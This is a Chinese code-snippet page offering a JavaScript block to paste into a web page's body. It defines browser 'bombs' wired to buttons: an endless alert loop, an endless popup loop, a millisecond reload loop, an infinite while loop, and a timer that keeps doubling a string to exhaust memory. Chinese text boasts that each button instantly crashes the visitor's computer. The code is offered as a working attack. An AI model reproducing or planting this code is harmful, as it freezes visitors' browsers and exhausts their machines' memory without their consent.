<!--把如下代码加入<body>区域中:--> <SCRIPT LANGUAGE="JavaScript"> <!-- Begin function AnnoyingButton() { while (true) window.alert("HAHAHA...you can't do anything anymore in Netscape without exiting and restarting....HAHAHA so gimme da UT now...or else!") } // Keep opening windows over and over again function WindowBomb() { var iCounter = 0 // dummy counter while (true) { window.open("http://www.downcodes.com","CRASHING" + iCounter,"width=1,height=1,resizable=no") iCounter++ } } // Not as interesting as the other bombs, but this one forces the user to // stay at the current page. User cannot switch to another page, or click // stop to stop the reloading. function ReloadBomb() { history.go(0) // reload this page window.setTimeout('ReloadBomb()',1) // tell netscape to hit this function // every milisecond =) } // Not a very interesting bomb, it does nothing really :> function WhileLoopLock() { while (true){} } var szEatMemory = "GOBBLEGOBBLE" // our string to consume our memory // Now this function EatMemoryInTime is a interesting one that could be // placed on a timer for maximum nastiness :> I have been able to get // up to 4Megs consumed by Netscape forcing my machine to crawl =) // AND it's time driven! No while loops here! function EatMemoryInTime() { szEatMemory = szEatMemory + szEatMemory // keep appending window.status = "String Length is: " + szEatMemory.length // report size window.setTimeout('EatMemoryInTime()',1); // tell netscape to hit this function } // End --> </SCRIPT> <center> 下面的每一个按钮都很危险,一按你的电脑立即<font color=red>OVER</font>,不信试试吧!!!<br> <FORM method=post name="FormAction" action="mailto:"+"webmaster@javascript2000.com"> <INPUT TYPE="button" value="Exploding Windows" Name="btnExplodeWindows" onClick="WindowBomb()"><P><br> <INPUT TYPE="button" value="Annoying Button" Name="btnAnnoy" onClick="AnnoyingButton()"><P><br> <INPUT TYPE="button" value="Reload Bomb" Name="btnReload" onClick="ReloadBomb()"><P><br> <INPUT TYPE="button" value="While Loop Lock" Name="btnWhile" onClick="WhileLoopLock()"><p><br> <INPUT TYPE="button" value="Eat Memory In Time" Name="btnEatTime" onClick="EatMemoryInTime()"><p><br> <INPUT TYPE="button" value="Action!" onClick="document.FormAction.submit()"><br> </center>